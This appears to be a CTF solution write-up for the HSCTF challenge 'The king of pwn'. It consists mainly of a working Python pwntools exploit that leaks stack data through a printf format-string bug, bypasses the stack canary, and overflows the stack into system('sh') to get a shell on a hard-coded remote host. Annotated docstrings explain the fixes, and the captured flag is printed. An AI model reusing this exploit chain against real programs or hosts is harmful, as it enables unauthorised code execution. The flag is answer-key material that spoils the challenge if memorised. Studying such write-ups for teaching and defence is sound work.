The king of pwn
题目
解题报告
#!/usr/bin/env python
# coding=utf-8
import sys
from pwn import *
"""
知识点:格式化字符串,栈溢出利用
构造步骤:
1.利用prinf获取栈内容
2.构造包含原始栈信息的payload绕过canary保护
3.利用栈溢出get shell
HSCTF{K44p-7ring}
"""
if len(sys.argv) > 1:
p = remote("139.199.165.63", 10001)
else:
p = process("./pwn1")
context.log_level = 'debug'
def create_player(player_name):
    """Drive menu option 1: create a player with the given name.

    Waits for the menu (the line ending in "4.Confirm"), chooses "1", then
    answers the "Player name?" prompt with ``player_name``.  Pure I/O on the
    global pwntools tube ``p``; returns None.
    """
    p.recvuntil("4.Confirm\n")
    p.sendline("1")
    p.recvuntil("Player name?\n")
    p.sendline(player_name)
def change_player_name(player_name):
    """Drive menu option 2: replace the stored player name.

    Same menu/prompt dance as create_player(), but the prompt line here ends
    in "player name" rather than "Player name?".  This is the function the
    leak helpers use to plant each format string.  Returns None.
    """
    p.recvuntil("4.Confirm\n")
    p.sendline("2")
    p.recvuntil("player name\n")
    p.sendline(player_name)
def print_player_name():
    """Drive menu option 3: make the program print the stored name.

    Only sends the choice; the caller reads the output.  The fact that a name
    such as "%7$08x" comes back expanded (see get_fmt_offset) shows the binary
    passes the name to printf as the format string — the bug this whole
    script depends on.  The fix on the program side is printf("%s", name)
    (and building with -Wformat-security / _FORTIFY_SOURCE, which reject or
    catch positional "%n$" formats from non-literal strings).
    """
    p.recvuntil("4.Confirm\n")
    p.sendline("3")
def get_fmt_offset():
    """Find the printf argument index at which the name buffer itself sits.

    For i in 1..19 the name is set to "AAAA%<i>$08x" and printed; the first i
    whose output line contains "4141" (hex of "AA") is returned.  If no index
    in that range matches the function falls off the end and returns None,
    which later makes ``offset + 4`` in pwn() raise TypeError — the search
    range is a guess tuned to this binary.
    """
    # "%%" survives the "% i" formatting as a single "%", giving "%<i>$08x".
    payload = "AAAA%%%d$08x"
    for i in range(1, 20):
        change_player_name(payload % i)
        print_player_name()
        # NOTE(review): readline() consumes exactly one line after "3" is
        # sent; this assumes the echoed name is the first line of option 3's
        # output — confirm against the binary's actual menu text.
        if "4141" in p.readline():
            return i
def get_canary(offset):
    """Read 8 consecutive stack words via "%<k>$08x" and return them as raw bytes.

    For k in offset..offset+7 the name is set to "%<k>$08x", printed, and the
    8 hex characters are read back two at a time.  Each word is reassembled
    in little-endian order (printf shows the most significant byte first, so
    the four bytes are reversed before packing), and the eight 4-byte words
    are concatenated into a 32-byte string.  Despite the name, the result is
    the whole stack slice between the buffer and the saved return address,
    which the author expects to contain the canary; the exact index is set
    by the caller (offset + 4 in pwn()).

    NOTE(review): ``canary = ""`` followed by ``+= p8(...)`` relies on p8()
    returning str, i.e. Python 2 pwntools; under Python 3 p8() returns bytes
    and this concatenation would raise TypeError.
    """
    canary = ""
    payload = "%%%d$08x"
    for i in range(offset, offset + 8):
        change_player_name(payload % i)
        print_player_name()
        # NOTE(review): four fixed-size reads assume the echoed value starts
        # exactly at the current read position with no leading text — verify.
        byte4 = int(p.read(2), 16)
        byte3 = int(p.read(2), 16)
        byte2 = int(p.read(2), 16)
        byte1 = int(p.read(2), 16)
        canary += p8(byte1) + p8(byte2) + p8(byte3) + p8(byte4)
    return canary
def get_shell(canary, system_addr, sh_addr):
    """Drive menu option 4 and send the overflowing input, then go interactive.

    Payload layout (32-bit, as the p32() packing shows): 16 bytes of filler,
    the 32 bytes returned by get_canary() so the stack-protector check still
    sees its original value, then ``system_addr`` where the return address
    was, a 4-byte dummy return address for system(), and ``sh_addr`` as its
    argument.  Returns only when the interactive session ends.

    Defender's note: this stage works because (a) the canary was leaked
    through the format-string bug and (b) the addresses are fixed — see the
    absolute 0x0804xxxx constants in pwn().  Fixing the printf call removes
    (a); building the binary as PIE so ASLR randomises code and data removes
    the hard-coded addresses in (b).
    """
    p.recvuntil("4.Confirm\n")
    p.sendline("4")
    payload = "AAAABBBBCCCCDDDD"
    payload += canary
    payload += p32(system_addr)
    payload += "AAAA"
    payload += p32(sh_addr)
    p.send(payload)
    p.interactive()
def pwn():
    """Run the three stages end to end: leak offset, leak stack bytes, overflow.

    The two addresses are absolute 0x0804xxxx values, which is consistent
    with a non-PIE 32-bit ELF; they are specific to the challenge binary
    ./pwn1 and come from the author's static analysis (presumably the
    system() PLT stub and a "sh"-like string in the binary — not verified
    here).
    """
    system_addr = 0x08048430
    sh_addr = 0x08048820
    create_player("Sloth 003")
    offset = get_fmt_offset()
    # The stack slice read back starts 4 printf arguments past the name
    # buffer's own index; the "+ 4" is a binary-specific constant.
    # NOTE(review): get_fmt_offset() returns None if no index matches, and
    # this addition then raises TypeError rather than a clear message.
    canary = get_canary(offset + 4)
    get_shell(canary, system_addr, sh_addr)
# Script entry point; importing this module only sets up the tube ``p``
# (a side effect of the module-level if/else above) without running pwn().
if __name__ == '__main__':
    pwn()
Flag: HSCTF{K44p-7ring}